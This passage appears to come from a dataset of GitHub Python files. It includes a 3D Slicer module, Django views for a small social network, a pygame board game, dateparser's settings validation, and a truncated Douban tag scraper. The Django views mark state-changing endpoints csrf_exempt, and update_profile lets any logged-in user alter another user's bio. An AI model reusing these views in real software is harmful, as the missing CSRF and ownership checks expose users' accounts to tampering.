https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def __init__(self, parent):\n ScriptedLoadableModule.__init__(self, parent)\n self.parent.title = \"ScrModule\" # TODO make this more human readable by adding spaces\n self.parent.categories = [\"Examples\"]\n self.parent.dependencies = []\n self.parent.contributors = [\"John Doe (AnyWare Corp.)\"] # replace with \"Firstname Lastname (Organization)\"\n self.parent.helpText = \"\"\"\n This is an example of scripted loadable module bundled in an extension.\n It performs a simple thresholding on the input volume and optionally captures a screenshot.\n \"\"\"\n self.parent.acknowledgementText = \"\"\"\n This file was originally developed by Jean-Christophe Fillion-Robin, Kitware Inc.\n and Steve Pieper, Isomics, Inc. and was partially funded by NIH grant 3P41RR013218-12S1.\n\"\"\" # replace with organization, grant and thanks.\n\n#\n# ScrModuleWidget\n#\n\nclass ScrModuleWidget(ScriptedLoadableModuleWidget):\n \"\"\"Uses ScriptedLoadableModuleWidget base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def setup(self):\n ScriptedLoadableModuleWidget.setup(self)\n\n # Instantiate and connect widgets ...\n \n \n #\n # Modele Area\n #\n modelsCollapsibleButton = ctk.ctkCollapsibleButton()\n modelsCollapsibleButton.text = \"Models\"\n self.layout.addWidget(modelsCollapsibleButton)\n \n modelsFormLayout = qt.QFormLayout(modelsCollapsibleButton)\n \n #\n # Modele Combo\n #\n \n self.modelsSelector = slicer.qMRMLNodeComboBox()\n self.modelsSelector.nodeTypes = [\"vtkMRMLModelNode\"]\n self.modelsSelector.selectNodeUponCreation = True\n self.modelsSelector.addEnabled = False\n self.modelsSelector.removeEnabled = True\n self.modelsSelector.noneEnabled = True\n self.modelsSelector.showHidden = False\n self.modelsSelector.showChildNodeTypes = False\n self.modelsSelector.setMRMLScene( slicer.mrmlScene )\n self.modelsSelector.setToolTip( \"Pick the input to the algorithm.\" )\n modelsFormLayout.addRow(\"Input Model: \", self.modelsSelector)\n\n #\n # opacity value\n #\n self.modelOpacitySliderWidget = ctk.ctkSliderWidget()\n self.modelOpacitySliderWidget.singleStep = 0.1\n self.modelOpacitySliderWidget.minimum = 0\n self.modelOpacitySliderWidget.maximum = 100\n self.modelOpacitySliderWidget.value = 50\n self.modelOpacitySliderWidget.setToolTip(\"Set opacity value for computing the output image.\")\n modelsFormLayout.addRow(\"Model opacity\", self.modelOpacitySliderWidget)\n\n #\n # Show Button\n #\n self.showHideButton = qt.QPushButton(\"Show/Hide\")\n self.showHideButton.toolTip = \"Show/hide the model\"\n self.showHideButton.enabled = True\n modelsFormLayout.addRow(self.showHideButton)\n\n\n # connections\n\n self.showHideButton.connect('clicked(bool)', self.onShowHideButton)\n self.modelOpacitySliderWidget.connect('valueChanged(double)', self.onSliderValueChanged)\n\n # Add vertical spacer\n self.layout.addStretch(1)\n\n def cleanup(self):\n pass\n\n def onShowHideButton(self):\n logic = ScrModuleLogic()\n logic.showHideModel(self.modelsSelector.currentNode())\n\n def onSliderValueChanged(self):\n logic = ScrModuleLogic()\n opacityValue = self.modelOpacitySliderWidget.value\n logic.changeOpacity(self.modelsSelector.currentNode(), opacityValue)\n\n#\n# ScrModuleLogic\n#\n\nclass ScrModuleLogic(ScriptedLoadableModuleLogic):\n \"\"\"This class should implement all the actual\n computation done by your module. The interface\n should be such that other python code can import\n this class and make use of the functionality without\n requiring an instance of the Widget.\n Uses ScriptedLoadableModuleLogic base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n \n def isValidModelData(self, modelNode):\n \"\"\"Validates if the model is empty\n \"\"\"\n if not modelNode:\n logging.debug('isValidAllData failed: no model node defined')\n return False\n return True\n\n\n def changeOpacity(self, model, opacityVal):\n if not self.isValidModelData( model):\n slicer.util.errorDisplay('Wrong input model')\n return False\n n = model.GetDisplayNode()\n n.SetOpacity(opacityVal/100)\n return True\n\n def showHideModel(self, model):\n if not self.isValidModelData( model):\n slicer.util.errorDisplay('Wrong input model')\n return False\n n = model.GetDisplayNode()\n v = n.GetVisibility()\n if (v==1):\n n.SetVisibility(0)\n else:\n n.SetVisibility(1)\n\n\nclass ScrModuleTest(ScriptedLoadableModuleTest):\n \"\"\"\n This is the test case for your scripted module.\n Uses ScriptedLoadableModuleTest base class, available at:\n https://github.com/Slicer/Slicer/blob/master/Base/Python/slicer/ScriptedLoadableModule.py\n \"\"\"\n\n def setUp(self):\n \"\"\" Do whatever is needed to reset the state - typically a scene clear will be enough.\n \"\"\"\n slicer.mrmlScene.Clear(0)\n\n def runTest(self):\n \"\"\"Run as few or as many tests as needed here.\n \"\"\"\n self.setUp()\n self.test_ScrModule1()\n\n def test_ScrModule1(self):\n \"\"\" Ideally you should have several levels of tests. At the lowest level\n tests should exercise the functionality of the logic with different inputs\n (both valid and invalid). At higher levels your tests should emulate the\n way the user would interact with your code and confirm that it still works\n the way you intended.\n One of the most important features of the tests is that it should alert other\n developers when their changes will have an impact on the behavior of your\n module. For example, if a developer removes a feature that you depend on,\n your test should break so they know that the feature is needed.\n \"\"\"\n\n self.delayDisplay(\"Starting the test\")\n #\n # first, get some data\n #\n import urllib\n downloads = (\n ('http://slicer.kitware.com/midas3/download?items=5767', 'FA.nrrd', slicer.util.loadVolume),\n )\n\n for url,name,loader in downloads:\n filePath = slicer.app.temporaryPath + '/' + name\n if not os.path.exists(filePath) or os.stat(filePath).st_size == 0:\n logging.info('Requesting download %s from %s...\\n' % (name, url))\n urllib.urlretrieve(url, filePath)\n if loader:\n logging.info('Loading %s...' % (name,))\n loader(filePath)\n self.delayDisplay('Finished with download and loading')\n\n volumeNode = slicer.util.getNode(pattern=\"FA\")\n logic = ScrModuleLogic()\n self.assertTrue( logic.hasImageData(volumeNode) )\n self.delayDisplay('Test passed!')\n","repo_name":"chorobabeata/PWP_slicer","sub_path":"ScrModule/ScrModule.py","file_name":"ScrModule.py","file_ext":"py","file_size_in_byte":6948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"10991118793","text":"import json\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.db import IntegrityError\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.http import require_POST, require_GET\nfrom django.contrib import messages\nfrom django.core.paginator import Paginator\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom .models import User, Reply, Follow, Post\n\n\ndef index(request):\n try:\n # Query for all posts\n posts = Post.objects.all()\n # 10 objects per page\n paginator = Paginator(posts, 10)\n page_number = request.GET.get(\"page\")\n page_obj = paginator.get_page(page_number)\n except:\n return render(request, \"network/index.html\", {\n \"message\": \"Oops! Something went wrong.\"\n })\n\n try:\n posts_liked = request.user.likes.all()\n except:\n posts_liked = None\n\n for obj in page_obj:\n # user-based unique views count\n if request.user.is_authenticated and request.user not in obj.viewed_by.all():\n try:\n obj.view_count += 1\n obj.viewed_by.add(request.user)\n obj.save()\n except:\n return render(request, \"network/index.html\", {\n \"message\": \"Oops! Something went wrong\"\n })\n\n # ! after posting, user ends up seeing empty page !\n return render(request, \"network/index.html\", {\n \"page_posts\": page_obj,\n \"posts_liked\": posts_liked\n })\n\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"network/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"network/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"network/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"network/register.html\", {\n \"message\": \"Username already taken.\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"network/register.html\")\n\n\n@login_required(login_url=\"login\")\n@require_POST\ndef create_post(request):\n content = request.POST[\"post\"]\n if not content or content.strip() == \"\":\n messages.info(request, \"Must provide content.\")\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n post = Post(content=content, author=request.user)\n post.save()\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef profile_view(request, id):\n owner = User.objects.get(pk=id)\n posts = Post.objects.filter(author_id=id)\n paginator = Paginator(posts, 10)\n page_number = request.GET.get(\"page\")\n page_obj = paginator.get_page(page_number)\n # is user following the profile owner\n is_following = owner.followers.filter(follower_id=request.user.id).exists()\n\n try:\n posts_liked = request.user.likes.all()\n except:\n posts_liked = None\n\n for obj in page_obj:\n if request.user.is_authenticated and request.user not in obj.viewed_by.all():\n try:\n obj.view_count += 1\n obj.viewed_by.add(request.user)\n obj.save()\n except:\n return render(request, \"network/index.html\", {\n \"message\": \"Oops! Something went wrong\"\n })\n\n return render(request, \"network/profile.html\", {\n \"posts\": posts,\n \"page_posts\": page_obj,\n \"posts_liked\": posts_liked,\n \"owner\": owner,\n \"is_following\": is_following,\n })\n\n\n@login_required(login_url=\"login\")\n@require_POST\ndef follow(request, id):\n user_to_be_followed = User.objects.get(pk=id)\n follow = Follow(user=user_to_be_followed, follower=request.user)\n follow.save()\n return HttpResponseRedirect(reverse(\"profile\", kwargs={\"id\": id}))\n\n\n@login_required(login_url=\"login\")\n@require_POST\ndef unfollow(request, id):\n user_to_be_unfollowed = User.objects.get(pk=id)\n follow = Follow.objects.filter(\n user_id=user_to_be_unfollowed.id, follower_id=request.user.id)\n follow.delete()\n return HttpResponseRedirect(reverse(\"profile\", kwargs={\"id\": id}))\n\n\n@login_required(login_url=\"login\")\n@require_GET\ndef following(request):\n user = request.user\n followed_users = user.following.values()\n followed_users_ids = [obj[\"user_id\"] for obj in followed_users]\n posts = Post.objects.filter(author_id__in=followed_users_ids)\n paginator = Paginator(posts, 10)\n page_number = request.GET.get(\"page\")\n page_obj = paginator.get_page(page_number)\n\n try:\n posts_liked = request.user.likes.all()\n except:\n posts_liked = None\n\n for obj in page_obj:\n if request.user.is_authenticated and request.user not in obj.viewed_by.all():\n try:\n obj.view_count += 1\n obj.viewed_by.add(request.user)\n obj.save()\n except:\n return render(request, \"network/index.html\", {\n \"message\": \"Oops! Something went wrong\"\n })\n\n return render(request, \"network/following.html\", {\n \"page_posts\": page_obj,\n \"posts_liked\": posts_liked,\n })\n\n\n@csrf_exempt\n@login_required(login_url=\"login\")\ndef update_post(request, id):\n # Query for reqeusted post\n try:\n post = Post.objects.get(pk=id)\n except Post.DoesNotExist:\n return JsonResponse({\"error\": \"Post not found\"}, status=404)\n\n if request.method == \"PUT\":\n if post.author == request.user:\n # deserialize json to python object\n data = json.loads(request.body)\n content = data[\"content\"]\n post.content = content\n post.is_updated = True\n post.save()\n return HttpResponse(status=204)\n else:\n return JsonResponse({\n \"error\": \"Not authorized for this action.\"\n })\n else:\n return JsonResponse({\n \"error\": \"Only PUT request allowed.\"\n }, status=400)\n\n\n@csrf_exempt\n@login_required(login_url=\"login\")\ndef delete_post(request, id):\n if request.method == \"DELETE\":\n # Query for requested post\n try:\n post = Post.objects.get(pk=id)\n except Post.DoesNotExist:\n return JsonResponse({\"error\": \"Post not found\"}, status=404)\n\n if post.author == request.user:\n post.delete()\n return HttpResponse(status=204)\n else:\n return JsonResponse({\n \"error\": \"Not authorized for this action.\"\n }, status=401)\n # Deletion must be via DELETE\n else:\n return JsonResponse({\n \"error\": \"DELETE request required.\"\n }, status=400)\n\n\n@csrf_exempt\n@login_required(login_url=\"login\")\n@require_POST\ndef like(request, id):\n # Query for requested post\n try:\n post = Post.objects.get(pk=id)\n except Post.DoesNotExist:\n return JsonResponse({\"error\": \"Post not found\"}, status=404)\n\n post.liked_by.add(request.user)\n post.save()\n return HttpResponse(status=204)\n\n\n@csrf_exempt\n@login_required(login_url=\"login\")\n@require_POST\ndef unlike(request, id):\n # Query for requested post\n try:\n post = Post.objects.get(pk=id)\n except Post.DoesNotExist:\n return JsonResponse({\"error\": \"Post not found\"}, status=404)\n\n post.liked_by.remove(request.user)\n post.save()\n return HttpResponse(status=204)\n\n\n@login_required(login_url=\"login\")\n@require_GET\ndef post_details(request, id):\n try:\n post = Post.objects.get(pk=id)\n except Post.DoesNotExist:\n return HttpResponseRedirect(reverse(\"index\"))\n\n try:\n posts_liked = request.user.likes.all()\n except:\n posts_liked = None\n\n if request.user.is_authenticated and request.user not in post.viewed_by.all():\n try:\n post.view_count += 1\n post.viewed_by.add(request.user)\n post.save()\n except:\n messages.error(request, \"Oops! Something went wrong about views.\")\n return HttpResponseRedirect(reverse(\"post_details\", kwargs={\"id\": id}))\n\n replies = Reply.objects.filter(post_id=id)\n return render(request, \"network/post.html\", {\n \"post\": post,\n \"replies\": replies,\n \"posts_liked\": posts_liked,\n })\n\n\n@login_required(login_url=\"login\")\n@require_POST\ndef reply(request, id):\n post = Post.objects.get(pk=id)\n try:\n content = request.POST[\"reply\"]\n if not content or content.strip() == \"\":\n messages.info(request, \"Must provide content.\")\n return HttpResponseRedirect(reverse(\"post_details\", kwargs={\"id\": id}))\n\n reply = Reply(author=request.user, reply=content, post=post)\n reply.save()\n except:\n return render(request, \"network/posts.html\", {\n \"message\": \"Oops! Could not post your reply. Try again later.\"\n })\n return HttpResponseRedirect(reverse(\"post_details\", kwargs={\"id\": id}))\n\n\n@csrf_exempt\n@login_required(login_url=\"login\")\n@require_POST\ndef delete_reply(request, id):\n reply = Reply.objects.get(pk=id)\n post_id = reply.post_id\n try:\n reply.delete()\n except:\n return render(request, f\"network/post/{id}.html\", {\n \"message\": \"Oops! Could not delete.\"\n })\n return HttpResponseRedirect(reverse(\"post_details\", kwargs={\"id\": post_id}))\n\n\n@csrf_exempt\n@login_required(login_url=\"login\")\ndef update_profile(request, id):\n user = User.objects.get(pk=id)\n if request.method == \"PUT\":\n # deserialize json to python object\n data = json.loads(request.body)\n bio = data[\"bio\"]\n user.bio = bio\n user.save()\n return HttpResponse(status=204)\n else:\n return JsonResponse({\n \"error\": \"Only PUT request allowed.\"\n }, status=400)\n\n\n# todo: add bookmark feature\n","repo_name":"hakanayata/growler","sub_path":"network/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2002927644","text":"def playg100():\r\n import pygame\r\n import random\r\n import pygame.locals\r\n import os\r\n import pickle\r\n import tkinter as tk\r\n pygame.init()\r\n\r\n ################################################ Instructions ########################################################\r\n root = tk.Tk()\r\n T11 = tk.Text(root, height = 20, width = 110)\r\n T11.pack()\r\n T11.insert(tk.END,\"HOW TO PLAY:\\nChoose number of players (2-5) and difficulty level (1-3).\\nThe player selects any number between 1 and 6 to move his/her character those many steps across a particular row of the board.\\nIf the player steps on a 'bomb', which vary as per the difficulty level, are randomly spread across the board and are invisible, he/she moves back 1/2/3/4 steps depending on number of boxes behind the player.\\nIts possible for the player to step on a bomb and go one step back, only to end up on another bomb and hence, go back another step. It can continue that way until the box the player is standing on has no bomb.\\nIf the character is near the end of the row and the number of steps he/she has chosen exceeds the remaining number of boxes on that row, he/she is automatically taken to the first square of the next row, regardless of the number chosen.\\n\\nCONDITIONS TO WIN:\\nThe first player to reach the last square of the last row wins.\")\r\n T11.configure(font = (\"helvetica\",15,\"bold\"))\r\n root.mainloop()\r\n Wi = []\r\n\r\n ####################################### Difficulty, Number of Players ################################################\r\n if os.path.exists(\"Rank.dat\"):\r\n os.remove(\"Rank.dat\")\r\n else:\r\n pass\r\n \r\n def difficulty(diff = 0):\r\n while diff == 0:\r\n diff = int(input(\"Enter difficulty level (1-3): \"))\r\n if 1 <= diff <= 3:\r\n return diff\r\n else:\r\n print(\"Difficulty level between 1 and 5 only.\")\r\n diff = 0\r\n\r\n def playerno(np = 0):\r\n while np == 0:\r\n np = int(input(\"Enter number of players (min 2, max 5): \"))\r\n if 2 <= np <= 5:\r\n return np\r\n else:\r\n print(\"Minimum is 2, maximum is 5. Numbers outside this range are not allowed.\")\r\n np = 0\r\n\r\n def board():\r\n screen.fill((255,255,255))\r\n for box1 in range(0,600,120):\r\n for box2 in range(0,600,120):\r\n pygame.draw.rect(screen,(255,0,0),[10+box1,10+box2,60,60])\r\n pygame.draw.rect(screen,(0,255,0),[10+box1,70+box2,60,60])\r\n pygame.draw.rect(screen,(0,255,0),[70+box1,10+box2,60,60])\r\n pygame.draw.rect(screen,(255,0,0),[70+box1,70+box2,60,60])\r\n\r\n ######################################### Creating Screen and Players ###################################################\r\n\r\n screen = pygame.display.set_mode((800,650))\r\n capt = pygame.display.set_caption(\"Get To 100\")\r\n done = True\r\n\r\n P = []\r\n char = []\r\n for i in range(0,playerno(0)):\r\n P.append(input(\"Enter name of player \" + str(i+1) + \":\"))\r\n char.append(pygame.Rect(15,15,50,50))\r\n\r\n O = []\r\n for out in range(0, 20+(10*difficulty(0))):\r\n x11 = 10+random.randrange(65,540,60)\r\n y11 = 10+random.randrange(5,600,60)\r\n O.append(pygame.Rect(x11,y11,50,50))\r\n print()\r\n\r\n ##################################### Game Code #################################################\r\n while done == True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n done = False\r\n\r\n ########################### Inputting Number of Steps ################################# \r\n for i in P:\r\n no = 0\r\n while no == 0:\r\n no = int(input(i+\", enter box no. you want to move forward to (1-6): \"))\r\n print()\r\n if (1 <= no <= 6):\r\n if (((no*60)+char[P.index(i)].x) > 555):\r\n if (char[P.index(i)].y == 555):\r\n root = tk.Tk()\r\n T1 = tk.Text(root, height = 3, width = 60)\r\n T1.pack()\r\n T1.insert(tk.END,i+\", you need less than \",no,\" steps to finish. Unfortunately, as the number chosen is between 1 and 6, your turn is over.\")\r\n T1.configure(font = (\"helvetica\",20,\"bold\"))\r\n root.mainloop()\r\n print()\r\n else:\r\n char[P.index(i)].y += 60\r\n char[P.index(i)].x = 15\r\n print(i,\" is in box \",(((10*((char[P.index(i)].y-15)/60))+((char[P.index(i)].x-15)/60))+1))\r\n else:\r\n char[P.index(i)].x += (no*60)\r\n print(i,\" is in box \",(((10*((char[P.index(i)].y-15)/60))+((char[P.index(i)].x-15)/60))+1))\r\n else:\r\n root = tk.Tk()\r\n T2 = tk.Text(root, height = 2, width = 65)\r\n T2.pack()\r\n T2.insert(tk.END,i+\", the number of steps must be between 1 and 6 only. Try again.\")\r\n T2.configure(font = (\"helvetica\",20,\"bold\"))\r\n root.mainloop()\r\n print()\r\n no = 0\r\n\r\n ##################################### Consequences of Stepping on a Bomb #########################################\r\n for out in O:\r\n for cha in char:\r\n if cha.colliderect(out):\r\n if cha.x == 135:\r\n cha.x -= 60\r\n print(\"As \",P[char.index(cha)],\" stepped on bomb(s), hence he/she is now in box number \",(((10*((cha.y-15)/60))+((cha.x-15)/60))+1))\r\n elif cha.x == 195:\r\n cha.x -= 120\r\n print(\"As \",P[char.index(cha)],\" stepped on bomb(s), hence he/she is now in box number \",(((10*((cha.y-15)/60))+((cha.x-15)/60))+1))\r\n elif cha.x == 255:\r\n cha.x -= 180\r\n print(\"As \",P[char.index(cha)],\" stepped on bomb(s), hence he/she is now in box number \",(((10*((cha.y-15)/60))+((cha.x-15)/60))+1))\r\n else:\r\n cha.x -= 240\r\n print(\"As \",P[char.index(cha)],\" stepped on bomb(s), hence he/she is now in box number \",(((10*((cha.y-15)/60))+((cha.x-15)/60))+1))\r\n \r\n ##################################### Declaring Winners ##########################################\r\n for cha in char:\r\n if (cha.y > 555) or (cha.x == 555 and cha.y == 555):\r\n Wi.append(P[char.index(cha)])\r\n rank = len(Wi)\r\n root = tk.Tk()\r\n T3 = tk.Text(root, height = 3, width = 50)\r\n T3.pack()\r\n T3.insert(tk.END,P[char.index(cha)]+\" HAS FINISHED THE GAME AND TAKEN RANK NO. \"+str(rank))\r\n T3.configure(font = (\"helvetica\",20,\"bold\"))\r\n root.mainloop()\r\n P.pop(char.index(cha))\r\n char.pop(char.index(cha))\r\n\r\n ################################## Graphics #######################################\r\n board()\r\n if len(char) == 0:\r\n done = False\r\n else:\r\n pass\r\n \r\n for cha in char:\r\n pygame.draw.ellipse(screen,(0,0,255),cha)\r\n pygame.display.flip()\r\n\r\n ########################################## Scoreboard ###############################################\r\n ranks= open('Rank.dat','wb')\r\n pickle.dump(Wi,ranks)\r\n ranks.close()\r\n ranks = open('Rank.dat','rb')\r\n firank = pickle.load(ranks)\r\n root = tk.Tk()\r\n T3 = tk.Text(root, height = 10, width = 40)\r\n T3.pack()\r\n T3.insert(tk.END,\"Rank\\t\\tName\")\r\n T3.configure(font = (\"helvetica\",20,\"bold\"))\r\n for ira in firank:\r\n T3.insert(tk.END,\"\\n\"+str(firank.index(ira)+1)+\"\\t\\t\"+ira)\r\n T3.configure(font = (\"helvetica\",15,\"bold\"))\r\n root.mainloop()\r\n## pygame.quit()\r\n\r\n##playg100()\r\n","repo_name":"Python-is-better-than-Java/Previous-Projects","sub_path":"Grade 11 and 12/Get_To_100.py","file_name":"Get_To_100.py","file_ext":"py","file_size_in_byte":8208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"12852133516","text":"import hashlib\nfrom datetime import datetime\nfrom functools import wraps\n\nfrom dateparser.data.languages_info import language_order\n\nfrom .parser import date_order_chart\nfrom .utils import registry\n\n\n@registry\nclass Settings:\n \"\"\"Control and configure default parsing behavior of dateparser.\n Currently, supported settings are:\n\n * `DATE_ORDER`\n * `PREFER_LOCALE_DATE_ORDER`\n * `TIMEZONE`\n * `TO_TIMEZONE`\n * `RETURN_AS_TIMEZONE_AWARE`\n * `PREFER_MONTH_OF_YEAR`\n * `PREFER_DAY_OF_MONTH`\n * `PREFER_DATES_FROM`\n * `RELATIVE_BASE`\n * `STRICT_PARSING`\n * `REQUIRE_PARTS`\n * `SKIP_TOKENS`\n * `NORMALIZE`\n * `RETURN_TIME_AS_PERIOD`\n * `PARSERS`\n * `DEFAULT_LANGUAGES`\n * `LANGUAGE_DETECTION_CONFIDENCE_THRESHOLD`\n * `CACHE_SIZE_LIMIT`\n \"\"\"\n\n _default = True\n _pyfile_data = None\n _mod_settings = dict()\n\n def __init__(self, settings=None):\n if settings:\n self._updateall(settings.items())\n else:\n self._updateall(self._get_settings_from_pyfile().items())\n\n @classmethod\n def get_key(cls, settings=None):\n if not settings:\n return \"default\"\n\n keys = sorted([\"%s-%s\" % (key, str(settings[key])) for key in settings])\n return hashlib.md5(\"\".join(keys).encode(\"utf-8\")).hexdigest()\n\n @classmethod\n def _get_settings_from_pyfile(cls):\n if not cls._pyfile_data:\n from dateparser_data import settings\n\n cls._pyfile_data = settings.settings\n return cls._pyfile_data\n\n def _updateall(self, iterable):\n for key, value in iterable:\n setattr(self, key, value)\n\n def replace(self, mod_settings=None, **kwds):\n for k, v in kwds.items():\n if v is None:\n raise TypeError('Invalid {{\"{}\": {}}}'.format(k, v))\n\n for x in self._get_settings_from_pyfile().keys():\n kwds.setdefault(x, getattr(self, x))\n\n kwds[\"_default\"] = False\n if mod_settings:\n kwds[\"_mod_settings\"] = mod_settings\n\n return self.__class__(settings=kwds)\n\n\nsettings = Settings()\n\n\ndef apply_settings(f):\n @wraps(f)\n def wrapper(*args, **kwargs):\n mod_settings = kwargs.get(\"settings\")\n kwargs[\"settings\"] = mod_settings or settings\n\n if isinstance(kwargs[\"settings\"], dict):\n kwargs[\"settings\"] = settings.replace(\n mod_settings=mod_settings, **kwargs[\"settings\"]\n )\n\n if not isinstance(kwargs[\"settings\"], Settings):\n raise TypeError(\n \"settings can only be either dict or instance of Settings class\"\n )\n\n return f(*args, **kwargs)\n\n return wrapper\n\n\nclass SettingValidationError(ValueError):\n pass\n\n\ndef _check_repeated_values(setting_name, setting_value):\n if len(setting_value) != len(set(setting_value)):\n raise SettingValidationError(\n 'There are repeated values in the \"{}\" setting'.format(setting_name)\n )\n return\n\n\ndef _check_require_part(setting_name, setting_value):\n \"\"\"Returns `True` if the provided list of parts contains valid values\"\"\"\n invalid_values = set(setting_value) - {\"day\", \"month\", \"year\"}\n if invalid_values:\n raise SettingValidationError(\n '\"{}\" setting contains invalid values: {}'.format(\n setting_name, \", \".join(invalid_values)\n )\n )\n _check_repeated_values(setting_name, setting_value)\n\n\ndef _check_parsers(setting_name, setting_value):\n \"\"\"Returns `True` if the provided list of parsers contains valid values\"\"\"\n existing_parsers = [\n \"timestamp\",\n \"relative-time\",\n \"custom-formats\",\n \"absolute-time\",\n \"no-spaces-time\",\n \"negative-timestamp\",\n ] # FIXME: Extract the list of existing parsers from another place (#798)\n unknown_parsers = set(setting_value) - set(existing_parsers)\n if unknown_parsers:\n raise SettingValidationError(\n 'Found unknown parsers in the \"{}\" setting: {}'.format(\n setting_name, \", \".join(unknown_parsers)\n )\n )\n _check_repeated_values(setting_name, setting_value)\n\n\ndef _check_default_languages(setting_name, setting_value):\n unsupported_languages = set(setting_value) - set(language_order)\n if unsupported_languages:\n raise SettingValidationError(\n \"Found invalid languages in the '{}' setting: {}\".format(\n setting_name, \", \".join(map(repr, unsupported_languages))\n )\n )\n _check_repeated_values(setting_name, setting_value)\n\n\ndef _check_between_0_and_1(setting_name, setting_value):\n is_valid = 0 <= setting_value <= 1\n if not is_valid:\n raise SettingValidationError(\n \"{} is not a valid value for {}. It can take values between 0 and \"\n \"1.\".format(\n setting_value,\n setting_name,\n )\n )\n\n\ndef check_settings(settings):\n \"\"\"\n Check if provided settings are valid, if not it raises `SettingValidationError`.\n Only checks for the modified settings.\n \"\"\"\n settings_values = {\n \"DATE_ORDER\": {\n \"values\": tuple(date_order_chart.keys()),\n \"type\": str,\n },\n \"TIMEZONE\": {\n # we don't check invalid Timezones as they raise an error\n \"type\": str,\n },\n \"TO_TIMEZONE\": {\n # It defaults to None, but it's not allowed to use it directly\n # \"values\" can take unlimited options\n \"type\": str\n },\n \"RETURN_AS_TIMEZONE_AWARE\": {\n # It defaults to 'default', but it's not allowed to use it directly\n \"type\": bool\n },\n \"PREFER_MONTH_OF_YEAR\": {\"values\": (\"current\", \"first\", \"last\"), \"type\": str},\n \"PREFER_DAY_OF_MONTH\": {\"values\": (\"current\", \"first\", \"last\"), \"type\": str},\n \"PREFER_DATES_FROM\": {\n \"values\": (\"current_period\", \"past\", \"future\"),\n \"type\": str,\n },\n \"RELATIVE_BASE\": {\n # \"values\" can take unlimited options\n \"type\": datetime\n },\n \"STRICT_PARSING\": {\"type\": bool},\n \"REQUIRE_PARTS\": {\n # \"values\" covered by the 'extra_check'\n \"type\": list,\n \"extra_check\": _check_require_part,\n },\n \"SKIP_TOKENS\": {\n # \"values\" can take unlimited options\n \"type\": list,\n },\n \"NORMALIZE\": {\"type\": bool},\n \"RETURN_TIME_AS_PERIOD\": {\"type\": bool},\n \"PARSERS\": {\n # \"values\" covered by the 'extra_check'\n \"type\": list,\n \"extra_check\": _check_parsers,\n },\n \"FUZZY\": {\"type\": bool},\n \"PREFER_LOCALE_DATE_ORDER\": {\"type\": bool},\n \"DEFAULT_LANGUAGES\": {\"type\": list, \"extra_check\": _check_default_languages},\n \"LANGUAGE_DETECTION_CONFIDENCE_THRESHOLD\": {\n \"type\": float,\n \"extra_check\": _check_between_0_and_1,\n },\n \"CACHE_SIZE_LIMIT\": {\n \"type\": int,\n },\n }\n\n modified_settings = settings._mod_settings # check only modified settings\n\n # check settings keys:\n for setting in modified_settings:\n if setting not in settings_values:\n raise SettingValidationError('\"{}\" is not a valid setting'.format(setting))\n\n for setting_name, setting_value in modified_settings.items():\n setting_type = type(setting_value)\n setting_props = settings_values[setting_name]\n\n # check type:\n if not setting_type == setting_props[\"type\"]:\n raise SettingValidationError(\n '\"{}\" must be \"{}\", not \"{}\".'.format(\n setting_name, setting_props[\"type\"].__name__, setting_type.__name__\n )\n )\n\n # check values:\n if setting_props.get(\"values\") and setting_value not in setting_props[\"values\"]:\n raise SettingValidationError(\n '\"{}\" is not a valid value for \"{}\", it should be: \"{}\" or \"{}\"'.format(\n setting_value,\n setting_name,\n '\", \"'.join(setting_props[\"values\"][:-1]),\n setting_props[\"values\"][-1],\n )\n )\n\n # specific checks\n extra_check = setting_props.get(\"extra_check\")\n if extra_check:\n extra_check(setting_name, setting_value)\n","repo_name":"scrapinghub/dateparser","sub_path":"dateparser/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":8456,"program_lang":"python","lang":"en","doc_type":"code","stars":2374,"dataset":"github-code","pt":"79"} +{"seq_id":"11000999332","text":"import requests\nfrom pyquery import PyQuery as pq\nimport redis\n\nurl = \"https://book.douban.com/tag/?view=type&icn=index-sorttags-all\"\n# 抓取信息\nres = requests.get(url)\n# 获取响应内容\ndata = res.content.decode('utf-8')\n# 用pyquery进行解析\ndoc = pq(data)\n# 连接Redis数据库\nr = redis.Redis(host=\"localhost\",port=\"6379\",decode_responses=True)\n\n# 获取所有含tags的a标签\nalist = doc(\"table.tagCol td a\")\n\nfor i in alist.items():\n\t'''\n\t遍历将tags放入redis数据库中\n\t'''\n\ttag = 